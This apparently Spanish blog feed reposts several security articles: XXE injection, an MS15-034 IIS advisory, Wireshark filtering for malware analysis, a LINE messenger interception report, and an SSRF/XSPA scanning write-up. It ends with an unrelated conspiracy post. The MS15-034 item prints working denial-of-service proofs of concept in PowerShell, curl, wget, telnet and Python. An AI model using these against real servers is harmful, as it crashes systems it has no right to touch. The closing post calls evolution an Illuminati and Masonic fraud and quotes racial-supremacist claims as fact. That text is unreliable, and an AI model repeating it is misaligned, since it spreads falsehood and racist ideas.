miércoles, 29 de abril de 2015

Ataques basados en entidades XML

Este tipo de ataques no son ninguna novedad y, que yo sepa, se conocen al menos desde principios del 2002. Sin embargo, cada vez que realizon una auditoría de una aplicación que procesa documentos XML, me suelo encontrar que son vulnerables a inyecciones XXE (XML External Entity) y XEE (XML Entity Expansion). Estas ultimas son menos frecuentes hoy en día debido a las configuraciones por defecto de la mayoría de procesadores por lo en este articulo nos centraremos en las primeras.
Antes de describir como funcionan los ataques XXE necesitamos entender que son las entidades XML. Estas entidades son una forma sencilla de crear aliases en un documento XML que podemos referenciar a lo largo del mismo y que nos pueden ahorrar escribir bastantes líneas de texto y reducir bastante el tamaño de los ficheros XML resultantes. El concepto es el mismo que el de entidades HTML donde existen aliases predefinidos para referenciar caracteres ASCII como &lt; y &gt; para < y >. En el caso de XML, las entidades se declaran en el bloque DOCTYPE. Por ejemplo, en el siguiente documento definimos una entidad llamada “terminos” para referirnos a los términos y condiciones de un contrato y de esta forma reducir el tamaño del XML:


Del mismo modo, podemos hacer referencia a entidades externas y hacer uso de protocolos como http y file para referenciar el texto que queremos que reemplace las entidades. Por ejemplo:


Desde el punto de vista de un atacante, esta característica de XML es muy interesante ya que si una aplicación recibe algún documento XML como entrada, lo procesa; un atacante podrá enviar un documento XML en el cual defina una entidad externa referenciando a cualquier fichero del servidor o recurso de la red interna y volcar el contenido del mismo en la salida. Permitiéndole acceder a cualquier recurso que el servidor de aplicaciones tenga permiso para leer.
Me imagino que estareis pensando que tampoco hay muchas aplicaciones que tomen como entrada un documento XML (ya sea mediante una URL o upload),  sin embargo, hay un tipo de servicios muy populares que están consumiendo documentos XML constantemente; los servicios web ya sean SOAP o RESTFul.
Por centrarnos en algo, echaremos un vistazo a los servicios web de tipo REST que cada vez se usan más para crear APIs para aplicaciones móviles nativas. Si nos fijamos en Java, veremos que los dos frameworks más usados para construir este tipo de servicios son: JAX-RS y SpringMVC.
JAX-RS es un standard y admite varias implementaciones. Todas ellas con el tiempo han deshabilitado la resolución de entidades externas por defecto excepto EasyRest (la implementación de JBoss) que por defecto resolverá las entidades externas a menos que lo configuremos para no hacerlo.
SpringMVC es otro cantar. Spring usa las librerías de Spring OXM para convertir los mensajes en XML en objetos Java que pone a disposición del desarrollador. Realmente SpringOXM no es ningún unmarshaller y lo que hace realmente es hacer de wrapper de otras soluciones como JAXB, Castor, XStream, etc … El problema viene de que aunque librerías como JAXB se puedan configurar para no resolver entidades externas, el wrapper de SpringOXM no solo usa una versión insegura por defecto si no que además no expone ninguna propiedad para poder deshabilitarlo por lo que cualquier servicio web basado en SpringMVC y usando JAXB (la librería por defecto y más popular) será vulnerable a este tipo de ataques. Esta vulnerabilidad fue reportada al equipo de Spring y ha sido corregida en la ultima versión (http://www.securityfocus.com/archive/1/528177). Veamos un ejemplo de cómo funcionaría estos ataques:
Pongamos que tenemos un servicio web de tipo REST que sirve de backend para una aplicación de gestión de contactos. El controlador del servicio tendrá una pinta parecida a esto (muy simplificado):


De tal forma que cuando el servicio reciba un petición para crear un contacto como la mostrada abajo, SpringOXM automágicamente hará un unmarshal del XML y creara un objeto de tipo Contact que almacenara en la base de datos.


La próxima vez que el usuario acceda a través de su aplicación móvil  a los detalles de este contacto, se enviará una petición a “getContact” que devolverá un XML con los detalles del contacto.


La próxima vez que el atacante use su móvil para comprobar el numero de Fulanito, recibirá el contenido del fichero /etc/passwd por el mismo precio :)
Esta vulnerabilidad no se limita unicamente a poder leer ficheros arbitrarios del servidor (que no esta mal ...) tambien puede ser usada para provocar DOS en el servidor (imaginad que leeis el fichero /dev/random) y para llevar a cabo ataques SSRF (Server Side Request Forgery). En este tipo de ataques lo que buscamos es que el servidor genere peticiones por nosotros (a poder ser cualquier tipo de petición y usando cualquier protocolo). De esta forma podremos pivotar en la red interna lanzando ataques desde el propio servidor de aplicaciones y saltandonos cualquier control a nivel de red que normalmente permiten el tráfico originado en el servidor de aplicaciones. Un protocolo muy interesante para lanzar este tipo de ataques el Gopher, pero eso daría para otro post.

Algunos estareis pensando si es posible lanzar este tipo de ataques de forma "ciega", es decir, cuando no podemos observar la salida del procesador XML. Timor Yunusov y Alexey Osipovya pensaron en esto y presentaron este año en la BlackHat Europea una forma de realizar ataques XXE OOB (Out of Band) en los que el propio procesador enviará los datos a un servidor controlado por nosotros.
Dependiendo del lenguaje y los frameworks usados, los procesadores XML resolverán entidades externas por defecto o tendremos que configurarlos de tal forma que no lo hagan. Tenlo en cuenta la próxima vez que programes algo relacionado con XML o hagas una auditoría de una aplicación que lo use.

Para ver mejor la entrada visitar la fuente:

http://www.securitybydefault.com/2013/09/ataques-basados-en-entidades-xml.html

Monitorizando la actividad de tu aplicación Android


Android-security.jpg

HP ha liberado una aplicación gratuita para ayudar a los equipos de seguridad y calidad encontrar vulnerabilidades.
ShadowOS, así se llama, está basado en una versión modificada de Android Kitkat, la cual intercepta la actividad generada en el sistema en general, en las siguientes áreas:
  • Acceso al sistema de ficheros. Muestra todo los accesos de lectura y escritura (path + nombre de fichero)
  • HTTP/HTTPS. Muestra todas la llamadas HTTP/HTTPS realizadas por la aplicación, incluyendo las realizadas por Webkit.
  • SQL Lite. Muestra todas las consultas a SQL Lite, incliyendo apertura, inserts y updates.
  • Cordova / PhoneGap. Muestra el tráfico web en aplicaciones basadas en Webkit.
ShadowOS, además de la versión de Android Kitkat, incluye una aplicación monitor, que es la que se comunica y nos muestra toda la actividad en las áreas anteriormente mencionadas.
Requiere:
  • Windows Vista o superior
  • Privilegios de Administrador
  • .Net 4.5
  • Android SDK para Windows
Aquí tenéis un vídeo de demostración:

https://youtu.be/rfshPBeVSoc

Para descargar la aplicación (necesita registro): http://go.saas.hp.com/shadow-os

Fuente: http://www.cyberhades.com/2015/04/23/monitorizando-la-actividad-de-tu-aplicacion-android/

jueves, 16 de abril de 2015

MS15-034: parchea ya o muere!


Mattias Geniar ha revelado la aparición de exploits para una vulnerabilidad crítica en HTTP.sys (CVE-2015-1635) de Microsoft Windows que podría permitir a un atacante ejecutar código arbitrario o causar una denegación de servicio.

"Existe una vulnerabilidad de ejecución remota de código en la pila del protocolo HTTP (HTTP.sys) que es causada cuando HTTP.sys analiza de forma incorrecta la sintaxis de ciertas solicitudes HTTP especialmente diseñadas. Un atacante que aproveche esta vulnerabilidad podría ejecutar código arbitrario en el contexto de la cuenta del sistema", en el Microsoft Security Bulletin MS15-034.

"Para aprovechar esta vulnerabilidad, un atacante tendría que enviar una solicitud HTTP especialmente diseñada al sistema afectado. La actualización corrige la vulnerabilidad al modificar la forma en que la pila HTTP de Windows maneja las solicitudes".

Precisamente, Mattias alertó que los primeros fragmentos de código para explotar MS15-034 en IIS están empezando a surgir, y lo peor, es trivial ejecutarlo y los resultados pueden ser catastróficos. Por ejemplo, conseguir que un servidor Win2k12 (y versiones posteriores) se caiga (BOYD) o se reinicie mediante una sóla petición HTTP:

- powershell:
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}

- curl:
$ curl -v 10.0.1.1/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

- un simple Python:
#Tested on Win Srv 2012R2.
import socket,sys
 
if len(sys.argv)<=1:   
 sys.exit('Give me an IP')
 
Host = sys.argv[1]
 
def SendPayload(Payload, Host):
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((Host, 80))
   s.send(Payload)
   s.recv(1024)
   s.close()
 
#Make sure iisstart.htm exist.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"
 
SendPayload(Init, Host)

- O incluso mediante un simple telnet:
$ telnet 10.0.1.1 80
GET / HTTP/1.1
Host: stuff
Range: bytes=0-18446744073709551615

- También enviando una petición a /welcome.png (2008 R2) o /iis-85.png (Windows Server 2012/R2):
wget --header="Range: bytes=18-18446744073709551615" http://blah-2012-server.com/iis-85.png

Ya véis la facilidad que supone probar estas simples PoC así que ya sabéis... actualizar las firmas de vuestros IPS, de vuestro WAFs y, sobretodo y si todavía no lo has hecho, ¡actualiza el IIS y los servidores Windows tan pronto como sea posible!

pd. Podéis comprobar si los servidores de vuestra LAN con este script de Nmap:
https://github.com/cldrn/nmap/blob/master/scripts/http-vuln-cve2015-1635.nse

Fuentes:
- Remote Code Execution Via HTTP Request In IIS On Windows
- Microsoft Window - HTTP.sys PoC (MS15-034)
- Microsoft Security Bulletin MS15-034 - Critical
- Exploit Code Emerging for Windows HTTP.sys Vulnerability – Patch Now!

- Metasploit (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb)
- [NSE] Script to detect remote code execution in Microsoft Windows systems (MS15-034)

 Fuente: http://www.hackplayers.com/2015/04/ms15-034-parchea-ya-o-muere.html

miércoles, 15 de abril de 2015

Uso de filtros en Wireshark para detectar actividad maliciosa

Desde el Laboratorio de ESET Latinoamérica las muestras son analizadas con el fin de obtener información sobre su comportamiento. El análisis dinámico de red se realiza en gran parte con Wireshark y brinda información en cuanto a las conexiones que se llevan a cabo.

¿Qué es Wireshark?

Wireshark es una herramienta multiplataforma utilizada para realizar análisis sobre paquetes de red. La utilización de esta herramienta puede parecer de gran complejidad en un principio, pero es de gran utilidad una vez conocida su interfaz y su forma de operar. Existen diferentes usos para los cuales puede aplicarse Wireshark. Dentro del análisis dinámico de códigos maliciosos se la utiliza para detectar conexiones ocultas del propio malware con direcciones remotas para obtener otros archivos, para reportarse a un panel de control en caso de una botnet, entre otras variantes.
En primera instancia, para realizar un análisis dinámico de un código malicioso se procede a infectar un sistema en un entorno controlado. Por lo general, se recurre a una máquina virtual. De esta forma, es posible ejecutar Wireshark y seleccionar la interfaz de red de la máquina virtual para comenzar a capturar los paquetes de red. A continuación puede visualizarse una captura de cómo se realiza la mencionada tarea:
Interfaz de red

Utilización de filtros
Una vez iniciada la captura es posible filtrar los paquetes capturados de acuerdo a la necesidad de quien esté analizando el malware. Como primer tarea, es posible reconocer a que servidores se conectó a través de las peticiones DNS. Para observarlo con más comodidad es posible aplicar un filtro. Específicamente, si se escribe DNS en el campo de los filtros y se lo aplica, serán visibles todas las resoluciones de nombres en direcciones IP. En el caso del malware, permite reconocer con que servidores se conecta. A continuación puede observarse una captura:
Filtro DNS
Otro aspecto a tener en cuenta son las peticiones realizadas. Aplicando el filtro “http.request” es posible obtener todos los GET y POST que fueron realizados durante el periodo de captura. Este tipo de peticiones es muy utilizado por los códigos maliciosos, incluso para enviar información sobre el sistema infectado. A continuación, puede observarse una captura de un análisis real sobre un malware que obtiene datos y archivos desde un servidor remoto:
Request GET
Un caso particular han sido aquellos códigos maliciosos que utilizan el protocolo SMTP para propagarse a través de correo electrónico. En estos casos es posible visualizar dichos paquetes a través del filtro SMTP o incluso es posible filtrar los paquetes para observar, por ejemplo, el remitente del correo. Esto se realiza a través del filtro “smtp.req.parameter && contains “FROM“”. De la misma forma, es posible visualizar aquellos paquetes que contienen el cuerpo del mensaje. Esta tarea puede realizarse a través de filtro “smtp.data.fragment”. A continuación puede visualizarse una captura con uno de los filtros aplicado:
Mail From
Es importante resaltar que los filtros explicados anteriormente no son los únicos. Existen una gran variedad para aplicar de acuerdo a la necesidad. Otro punto a tener en cuenta es que a medida que se obtienen los paquetes de acuerdo al filtro aplicado, es posible obtener toda la secuencia del paquete completo si es necesario. Para ello, solo es necesario colocar el cursor sobre el propio paquete y en el menú contextual elegir la opción de “follow tcp stream”. De esa forma se podrá visualizar el paquete completo tal como se muestra en la siguiente imagen:
Follow TCP stream
Los filtros son de gran utilidad y pueden ser aplicados en conjunto como parte de operaciones lógicas. Pueden utilizarse sobre la captura o especificarse previamente para que solo capturen lo especificado en el propio filtro. Este tipo de herramientas no solo es utilizado en el análisis de malware sino también en el estudio de protocolos de red, la búsqueda de vulnerabilidades y demás aplicaciones.

Fernando Catoira
Analista de Seguridad
Autor Fernando Catoira, ESET

FUENTE: http://www.welivesecurity.com/la-es/2013/01/28/uso-filtros-wireshark-para-detectar-actividad-maliciosa/

LINE vulnerable to man-in-the-middle attack

Naver LINE’s IM app sends messages over 3G networks in clear text, offering no privacy from anyone eavesdropping from within the network. Furthermore its design means that group chat keys intercepted may be reused at a later date to gain access to full chat history dating back months.

Line has 200 million users worldwide with over 18 million in Thailand.

This revelation comes as controversy continues to rage over whether Thailand’s police are intruding on citizens’ privacy by listening in on LINE messages, or whether chat logs would, as Naver’s CEO claims, be only released when presented with a Japanese court order.

Using packet capture software it was possible to intercept a LINE chat session at the network level and reconstruct it on a PC. Messages were sent in clear text to LINE’s server when on cellular data but encrypted when using Wi-Fi most of the time.
Lack of encryption would mean that a man in the middle - an ISP, telco, or arguably the NSA, GCHQ or any of the members of the Axis of Espionage monitoring fiber cables between the user and the server in Japan - could easily listen in on private communications.
An industry network engineer who asked not to be identified presented these findings to TelecomAsia, which then worked with him to verify and expand on the initial findings.
The team was able to write a 20-line python script that took the Cafe-ID a few other tokens intercepted from communication logs and used it to poll LINE’s server with a simple HTTP JSON request for new messages in the group chat. With a little tweaking of the parameters it was possible to get historical chats of the group dating back up to just under two months.

It would be conceivable that somewhere there is someone with a whole keyring of important people’s chatroom IDs collected over time which they could use to listen in at will.
These findings beg the question whether Naver intentionally designed its protocol to be so weak and obfuscated the weakness from network administrators so they would not have any problems entering repressive markets the way BlackBerry faced most notably in India and the Middle East.

It also lends credence to the Thai Police’s claim that LINE was secretly helping them with access to user logs despite repeated denials from the company, both of which now appear to be grammatically correct if misleading.
Thailand’s number one telco AIS is aware of the issue according to SVP for digital products Pratthana Leelapanang. “We realize that the communication of some application is not encrypted. Even [though] it is not our operator service, we are officially requesting LINE to fix such problem to further customer privacy,” he said.

Another AIS executive said that the telco does not save HTTP header metadata or share it with authorities, only the IP source and destination addresses.

However, Naver was adamant that its network is secure when presented with an abstract outline of the attack. A spokesperson said, “When using LINE, bugging and hacking on the users’ communications are impossible. Fundamentally, telecommunication companies’ wireless networks can’t be hacked. Also, while using other networks, such as WiFi, hacking on LINE is impossible since LINE uses HTTPS. Also, all types of authorization codes related with LINE certification are completely encrypted. Therefore, hacking or random change in codes are basically impossible.”
Nothing the spokesperson said addressed the weaknesses of a man-in-the-middle attack from someone within the telco or ISP or of the fact that LINE turned off encryption when on 3G, though the exact question was posed in an abstract form before the proof-of-concept attack was successfully carried out.
Dtac CEO Jon Eddy Abdullah dismissed the experiment as exceptional, insisting that in the real world it was impossible to sniff the keys over the air with a modern, secure telecoms network.
Asked if Dtac was sharing HTTP header metadata information that could be used to download chat logs with the authorities, Abdullah responded according to script, “as we are a Thailand operator, we can allow [access to] any traffic via our core network only in the case that we have got formal requests from responsible public agency to do.”

Shadow ICT Minister Sirichok Sopha was taken aback when presented with the findings. The opposition Democrat party uses LINE for much of its internal communications and said he would be taking the matter up with Naver and warning the party of this attack vector immediately.

Sirichok said that government cannot tell Naver how to write its software but it has a duty to present these issues to the public so they can make an informed decision as to whether or not to use the application given these severe privacy concerns.
TrueMove was contacted but did not reply at time of going to press.

The session keys used to retrieve chat logs may have an expiry date, but that was not evident during the duration of the study. Around 24 hours after the script was created, the same keys still managed to pull chat logs from Naver’s servers.

In a small number of cases the LINE app connected to WiFi unencrypted though it is still unclear how and why that was so. This is of particular concern as all the major telcos run extensive hetnet unencrypted Wi-Fi offload networks.
Additional reporting thanks to Suchit Leesa-nguansuk, Senior Reporter at the Bangkok Post.

FUENTE: http://www.telecomasia.net/blog/content/line-vulnerable-man-middle-attack

EXTRA: http://superman-kartini.blogspot.com/2013/05/protokol-security-line-messenger.html

Cómo explotar un SSRF (Server Side Request Forgery) y hacer un XSPA (Cross Site Port Attacks) a una DMZ

Las vulnerabilidades SSRF (Server Side Request Forgery) y los ataques de XSPA (Cross Site Port Attacks) son dos fallos de seguridad que van casi siempre de la mano. Los bugs de SSRF se producen en aplicaciones web inseguras que permiten a un atacante forzar al servidor web a realizar peticiones desde dentro del sistema hacia el exterior. Usando esas conexiones, los ataques de XSPA tratan de conocer, en base a las respuestas obtenidas, la lista de puertos que se encuentran abiertos o por el contrario cerrados en el servidor al que se fuerza la conexión.

Figura 1: Cómo explotar un SSRF y hacer un XSPA a una DMZ

Es importante tener claro que estas vulnerabilidades afectan al Back-End y que vienen conducidas por una mala validación en el Front-End o API al poder ser manipuladas las direcciones a las que se le van a realizar peticiones desde el Back-End. La principal ventaja para un atacante de que las peticiones sean realizadas desde dentro de la red en la que se encuentra el sistema vulnerable es que le van a permitir acceder a sitios que de otra manera no podría (pivoting), tal como sucede cuando estamos conectados a nuestro router y podemos acceder a las maquinas conectadas a nuestra red local.

SSRF & XSPA en buscadores y paneles de administración con CSPP 

Estos fallos son muy típicos, y ya los hemos visto en un buen número de sitios. En el artículo de Buscadores como arma de destrucción masiva se hablaba de posibles ataques de SSRF utilizando la indexación maliciosa o los agregadores de noticias, que permitían por ejemplo que un servidor lanzara un ataque de SQL Injection sin interacción alguna del atacante.

Figura 2: Ejemplo de utilización de un agregador de noticias para realizar ataques SSRF

Un caso curioso de SSRF son los paneles de administración expuestos en Internet, como sitios de configuración de impresoras HP que permiten escanear la DMZcompleta, o los casos de bugs de Connection String Parameter Polution, tanto debases de datos MySQL como de tecnologías .NET. Con ellos hemos visto lo fácil que es realizar ataques de XSPA (Cross Site Port Attacks) aprovechando estas vulnerabilidades de SSRF o CSPP, como en el caso de las herramietnas MyLittleAdmin.

Figura  3: XSPA en MyLittleAdmin for SQL Server

Como se ve, aprovechando la ventaja de que sea el Back-End el encargado de realizar peticiones internamente y que estas a su vez puedan ser manipuladas, permitiría a un atacante apuntar a direcciones IP internas y ya sea visualizando la respuesta o en base a tiempos dibujar un mapa de los activos de la red interna o conocer los puertos abiertos. A continuación les dejo una serie de enlaces donde se documenta cómo explotaron este fallo en sitios de Yahoo!, Facebook o Coinbase, por poner solo algunos ejemplos:
• Yahoo! SSRF/XSPA Vulnerability
• XSPA / SSRF bug with Facebook's Developer Web Application
• SSRF/XSPA Bug in Coinbase
SSRF/XSSA usando ScreenShots

El siguiente caso que les traigo me pareció interesante, vendría a ser algo así comoSSRF/XSSA aprovechando un sistema implementado para hacer ScreenShots en aplicaciones web. Esto es algo similar a lo que se publicó por aquí en el artículo de "Jugando con los ojos", donde aprovechando un sistema de captura de pantallas en distintos navegadores se hacían ataques a terceros servidores.

En este caso se trata de una aplicación web hecha en ruby on rails que a través de un sencilla interfaz web, recibe una URL o dominio que luego es enviada a un servicio externo que consulta en su base de datos quién es el propietario del dominio - lo que viene a ser un Whois -. Una vez el servicio Whois devuelve una respuesta a la aplicación web, ésta - además de imprimir dichos datos a través del navegador- seguidamente realizará una captura de pantalla levantando un navegador que visitará la misma dirección. 

Figura 4: Funcionamiento normal de la web con el screenshot de Google

Como se puede ver en el navegador aparece en la parte inferior derecha una imagen de la página principal de google.com, al inspeccionar el elemento se puede comprobar que el nombre de la imagen parece ser un Hash MD5 por los 32caracteres de longitud, que efectivamente corresponde a la concatenación del dominio más un slash tal que así google.com/

Figura 5: Nombre de la imagen vinculada al screenshot

Escaneando la DMZ interna

Entonces, recordando la ventaja que supone que sea el servidor web el encargado de realizar la petición, por su conectividad con el resto de máquinas de su red interna, se podría realizar un escaneo completo de la DMZ. Para ello sería cuestión de ir probando a enviar por el parámetro uri, diferentes direcciones IP locales con la esperanza de obtener capturas de pantalla de máquinas de la red interna que tengan corriendo en el puerto 80 aplicaciones con interfaz web. Para ello bata con lanzar varias peticiones enviado varias direcciones IP locales, desde la 192.168.0.1 a la192.168.0.24, y una vez el servicio externo hubiese procesado la dirección IP y devuelto la respuesta, se realizaría la captura de pantalla contra el servidor web en dicha dirección IP.

Figura 6: Resultados del escaneo completo de la DMZ

Ya por último teniendo un listado de las rutas a las imágenes que contiene las capturas realizadas, bastaría con acceder a cada una de ellas para comprobar si contenían algo interesante o simplemente estaban en blanco.

Figura 7: Resultados obtenidos con Burp

Después de realizar peticiones e intentar acceder a cada uno los enlaces con las imágenes, pude ver que algunas tenían un peso mayor que otras, dando a entender que algunas capturas realizadas contra algunas direcciones IP locales SÍ contenían información,  y por lo consiguiente alguna aplicación web corriendo sobre la máquina con dicha dirección IP. Ordene el listado de las imágenes por peso y fui visualizando cada una de ellas, algunas contenían información muy sensible y otras simplemente el típico banner de un servidor Apache.

Nota de reflexión final

Por supuesto, este tipo de vulnerabilidades son muy peligrosas, ya que desde el servidor no solo se puede hacer el escaneo de puertos, sino que se pueden hacer ataques de SQL Injection a servidores internos, Heartbleed o ShellShock, por poner algunos casos, así que hay que tener mucho cuidado con ellas.

Autor: Ricardo Martín (@ricardo090489)
Security QA Engineer en Eleven Paths

FUENTE: http://www.elladodelmal.com/2015/04/ssrf-server-side-request-forgery-xspa.html

martes, 14 de abril de 2015

“Otra mentira de la Elite: Teoría de la Evolución de Charles Darwin”


Charles era un masón que operó como parte clave del Plan NOM, y cuya ridícula teoría jamás explicó básicas cuestiones como las siguientes:
Si el hombre desciende del mono, que hace el mono conviviendo con nosotros? Algunos evolucionaron naturalmente y otros no llegaron ni a Neandertals?? A quiénes se llama homínidos y cuantas clases hay?
Porque el chimpancé tiene 48 cromosomas y el humano 46, pero tiene mayor desarrollo cerebral? Qué ocurrió que perdimos 12 hélices del ADN llamado "basura" de la noche a la mañana?. El chimpancé es más fuerte y mejor adaptado al medio, sus pelos en el cuerpo lo protegen perfectamente del ambiente más hostil, e incluso sus uñas y pelo crecen hasta un largo determinado en tanto que en el humano esto no ocurre… somos más débiles en todos los aspectos físicos pero sólo en 200 mil años nuestro cerebro e intelecto creció de manera desproporcionada al resto de los mamíferos.
De que animal evolucionaron los delfines y murciélagos que tienen un sistema de “sonar vibracional” para comunicarse? No hay evolución que lo explique siendo ambos mamíferos, aún en la actualidad no hay teorías claras, y las mismas son muy controvertidas.
Porqué animales como ciertos tiburones, mosquitos o cocodrilos no evolucionaron en millones de años? Y los grandes saurios con miles de millones de antigüedad sobre los primeros humanos ¡Dónde están, en qué evolucionaron?... es que acaso nos quedamos con la teoría del asteroide que cayó y extinguió todo ser vivo, cuando hoy hay pruebas de que cada fósil encontrado demuestra que la muerte de los mismos fue asfixie por envenenamiento. Además la teoría del asteroide hoy es controvertida también. Dejo link si desea investigar :(http://www.lareserva.com/home/dinosaurio_teoria_extincion)
Ud investigue cada duda que le surja de lo que aquí mencionamos… se sorprenderá de la manipulación a la que hemos y somos expuestos. De momento continuemos con nuestro estimado Charles...
Comenzamos por el final…, A quiénes beneficiaba la Teoría de la Evolución? … A los illuminatis y su NOM, ya que parte del Plan de la Cabalá es que se debía separar CIENCIA y RELIGION; esta última tenía en aquél contexto que perder poder, máxime considerando que algunos religiosos jerárquicos osaban perseguir a las Sociedades Secretas de la época.
Se debía generar confusión en el humano, una teoría satánica para confundir y engañar y poder instalar la ciencia como doctrina. Además se instala en la sociedad el funcionamiento piramidal jerárquico illuminati a través de la “selección natural”, donde la teoría del más fuerte o iluminado NATURALMENTE controla o mata al débil. Finalmente ocultan y trastocan nuestro verdadero origen como especie humana.
TODO JUSTIFICADO CON UN GRAN TELON DE FONDO: “EL ESLABON PERDIDO” – que así seguirá porque no existe, ya que la evolución es producto de una manipulación genética de cuyo tema se aportará en otro momento -
Wikipedia es controlada por la Hemandad negra, y lo utilizan como un moderno medio de “desinformación”. Wikipedia dice lo siguiente: “Charles Robert Darwin (12 de febrero de 1809 – 19 de abril de 1882) fue un naturalista inglés que postuló que todas lasespecies de seres vivos han evolucionado con el tiempo a partir de un antepasado común mediante un proceso denominadoselección natural. La evolución fue aceptada como un hecho por la comunidad científica. La Teoría fue considerada como la explicación primaria del proceso evolutivo en los años 1930.  Actualmente constituye la base de la síntesis evolutiva moderna. Con sus modificaciones, los descubrimientos científicos de Darwin aún siguen siendo el acta fundacional de la biología como ciencia, puesto que constituyen una explicación lógica que unifica las observaciones sobre la diversidad de la vida. Con apenas 16 años Darwin ingresó en la Universidad de Edimburgo, aunque paulatinamente fue dejando de lado sus estudios de medicina para dedicarse a la investigación de invertebrados marinos. Durante sus estudios de medicina, asistió dos veces a una sala de operaciones en el hospital de Edimburgo, y huyó de ambas dejándole una profunda impresión negativa. Posteriormente, la Universidad de Cambridge dio alas a su pasión por las ciencias naturales. Intrigado por la distribución geográfica de la vida salvaje y por los fósiles que recolectó en su periplo, Darwin investigó sobre el hecho de la transmutación de las especies y concibió su teoría de la selección natural en 1838. Aunque discutió sus ideas con algunos naturalistas, necesitaba tiempo para realizar una investigación exhaustiva, y sus trabajos geológicos tenían prioridad. Se encontraba redactando su teoría en 1858 cuando Alfred Russel Wallace le envió un ensayo que describía la misma idea, urgiéndole Darwin a realizar una publicación conjunta de ambas teorías. (…)”
Destaquemos algunos puntos para ir comprendiendo de que se trata el tema:
Son “TEORIAS”, sin embargo se enseñan como palabra oficial, siendo recién en 1930 que se adopta oficialmente como postura primaria. Por otra parte Chales nació en 1809, y según su historia concluyó la Teoría más revolucionaria de la ciencia hasta el momento a los 29 años de edad. Aparentemente un elegido, pero veamos...
Charles era “NATURALISTA (¿?)”, es decir que además de ser MASON como su abuelo (algo que no se menciona), pastor de ovejas (y tal vez por ello se lo califica de naturalista) realizó estudios Universitarios a la inmadura edad de 16 años, cursando sólo algunos meses de la carrera de Medicina, la cual abandonó. Tenemos entonces: Poco estudió, algo de investigación, unos cuantos viajes y sobre todo un artista del plagio al desconocido popularmente Alfred Russel Wallace (probable Masón), quien SI era médico y CASUALMENTE formuló una casi perfecta replica de la Teoría de la Evolución, y  CASUALMENTE conoció a Chales y así concretar fielmente aquello deseado (o tal vez indiciado) por su Abuelo. Abuelo???
Pero, ¡Quién era el abuelo de Charles Darwin??....
El abuelo del naturalista, Erasmus Darwin, fue uno de los maestros de la conocida Logia Canongate Kilwinning de Edimburgo. Estaba conectado también con los masones de Francia y con los Illuminati, que habían hecho del trabajo antirreligioso su tarea principal. Darwin heredó de su abuelo el amor por el naturalismo del que Erasmus había sido precursor en Inglaterra. Esta tendencia asumía que la esencia del universo estaba en la propia naturaleza y negaba que hubiese un Creador trascendente.  Me pregunto si es posible que los ideales masónicos del abuelo calaran en Charles?, Charles, efectivamente, completaría con su trabajo una gran misión a favor de esta causa.

Además, Erasmus había criado a su hijo Robert (el padre de Charles) en sus mismos ideales y lo había introducido en las logias masónicas. Charles desde luego fue un iniciado. Según Harun Yahya: «la masonería era uno de los poderes centrales que condujo el largo combate para abatir el viejo orden socio-económico que se apoyaba en la religión y reemplazarlo por un nuevo orden secular». Eran los movimientos del ajedrez del NOM en aquella época.
El padre de la Teoría de la Evolución había estudiado teología en Cambridge y en su histórico viaje a bordo del H.M.S. Beagle llevó consigo dos libros: La Biblia y Principios de Geología, de Charles Lyell. Se diría, pues, que nuestro protagonista estaba más preparado para la religión que para la biología. ¿Cuál fue entonces el «factor» que inclinó la balanza por las ideas antirreligiosas?. Usted ahora ya lo conoce.
Las ideas de Darwin eran totalmente inaceptables para los cristianos. Estos pensaban que el mundo había sido creado hacía seis mil años, tal como se interpretaban los seis días del Génesis en el Antiguo Testamento. El origen de las especies representó, por tanto, un hito culminante en la lucha por liberar al pensamiento y a la ciencia de la religión.
Para concluir sobre el segmento de investigaciones y bases científicas en las que se basa la Teoría resumiré diciendo que desde las pruebas embrionarias, hasta las pruebas de frasco de Mille- Urey pasando por los pinzones de Galápagos, todos y cada uno fueron prácticas con resultados manipulados o fueron consideradas un fracaso como comprobante de la Teoría de la Evolución. Dejo en Ud. Investigar el tema si le interesa.
RELIGION DE LA EPOCA VS. MASONES (1):
Queda claro que el naturalismo fue promovido por la masonería. Este hecho fue proclamado especialmente en la conocida encíclica del Papa León XIII (1810-1903) Humanum Genus, en la cual leemos: «Todos los objetivos y esfuerzos de los masones conducen a una intención: abolir las disciplinas religiosas y sociales de la Cristiandad y establecer un nuevo sistema de normas basadas en los principios del naturalismo y en sus propias ideas».

De acuerdo con los ideales masónicos, la humanidad irá desarrollándose gradualmente hacia la apoteosis. En otras palabras: la evolución del hombre conduciría al superhombre, una aspiración que nace de los antiguos misterios. El propósito real de la masonería moderna no es, como se dice, la caridad o las obras sociales, sino la evolución espiritual de aquellos que aspiran a ser perfectos en su propia naturaleza y transformar sus cualidades pareciéndose a los dioses, aunque tendríamos que pensar de qué hablamos cuando decimos dioses con minúscula.

Con Dios exiliado de la ciencia, el concepto de un hombre a imagen y semejanza del Creador no tiene sentido y es ahí donde la masonería pone su acento doctrinal. Darwin escribió sobre ello en El origen de las especies: «La selección natural trabajó únicamente por y para el bien de cada ser vivo; todas las dotaciones corporales y mentales tenderán a progresar a la perfección (iluminación). Hay grandeza en esta visión de la vida… Desde el principio hemos conseguido los más bellos y maravillosos seres». Dicho de otro modo, la naturaleza esculpe una deidad emergente que se confunde y disuelve con ella misma (deísmo), idea que Karl Marx (judío sionista y masón) calificaría como «un modo bastante cínico de liberarse de la idea de Dios» y que atribuye a la filosofía burguesa.

NOM(2,3):

Algunos masones sostienen que una raza en particular ha tenido el favor de la evolución. Esta agenda racial fue delineada en septiembre de 1950 en New Age Magazine, la revista oficial del Concilio Supremo, grado 33 del rito escocés. En ella C. William Smith escribe: «Mirando atrás en la historia podemos ver fácilmente que la mano guiadora de la Providencia eligió a los nórdicos para comenzar y revelar el nuevo orden del mundo. Los documentos nos revelan que el 95% de los colonos norteamericanos son nórdicos anglosajones. La Providencia ha elegido a la raza nórdica para que nos revele la ‘Nueva Era’ del mundo… un Novus Ordo Seclorum».

